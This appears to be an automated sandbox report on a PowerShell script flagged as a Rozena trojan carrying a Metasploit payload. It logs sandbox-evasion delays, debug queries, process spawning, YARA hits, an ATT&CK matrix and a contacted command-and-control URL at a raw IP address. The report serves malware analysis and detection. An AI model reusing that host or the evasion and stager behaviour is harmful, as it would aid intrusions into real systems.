Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899850	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899650	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899500	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899300	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899150	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898850	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898650	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898450	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898300	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898150	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897950	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897800	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897600	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4804	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4225	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3035	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5502	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6032	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732	Thread sleep count: 3035 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736	Thread sleep count: 5502 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -899850s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -899650s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -899500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -899300s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -899150s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -899000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -898850s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -898650s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -898450s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -898300s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -898150s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -897950s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -897800s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -897600s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899850	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899650	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899500	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899300	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899150	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898850	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898650	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898450	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898300	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898150	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897950	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897800	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897600	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: WerFault.exe, 0000000D.00000002.764122461.0000000005390000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 0000000D.00000002.762824159.0000000004CC2000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW8P
Source: powershell.exe, 00000005.00000000.706668016.00000000087A4000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000002.762610157.0000000004BFB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 0000000D.00000002.764122461.0000000005390000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 0000000D.00000002.764122461.0000000005390000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 0000000D.00000003.730419455.0000000005770000.00000004.00000001.sdmp	Binary or memory string: VirtualMachine
Source: WerFault.exe, 0000000D.00000002.764122461.0000000005390000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552			Jump to behavior

Source: powershell.exe, 00000005.00000000.697407096.00000000031A0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: powershell.exe, 00000005.00000000.697407096.00000000031A0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 00000005.00000000.697407096.00000000031A0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: powershell.exe, 00000005.00000000.697407096.00000000031A0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Remote Access Functionality:

Yara detected Metasploit Payload

Show sources

Source: Yara match	File source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.706990419.0000000008BB0000.00000040.00000001.sdmp, type: MEMORY

Yara detected MetasploitPayload

Show sources

Source: Yara match	File source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700532257.0000000004DFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.758206256.000001CDA068C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.772219590.000001CDB7F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.711757799.0000000004DFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.758338125.000001CDA06AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.758303422.000001CDA06A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.758377802.000001CDA06B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.758256296.000001CDA0693000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.772859194.000001CDB8350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7144, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5964, type: MEMORY
Source: Yara match	File source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	PowerShell1	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion41	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	Virtualization/Sandbox Evasion41	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol112	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
a.ps1	51%	Virustotal		Browse
a.ps1	55%	ReversingLabs	Script-PowerShell.Trojan.Rozena
a.ps1	100%	Avira	TR/PowerShell.Gen

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://206.189.69.35/x1Fm	0%	Virustotal		Browse
http://206.189.69.35/x1Fm	0%	Avira URL Cloud	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.osofts/Microt0	0%	Avira URL Cloud	safe
http://crl.m	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://206.189.69.35/x1Fm	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
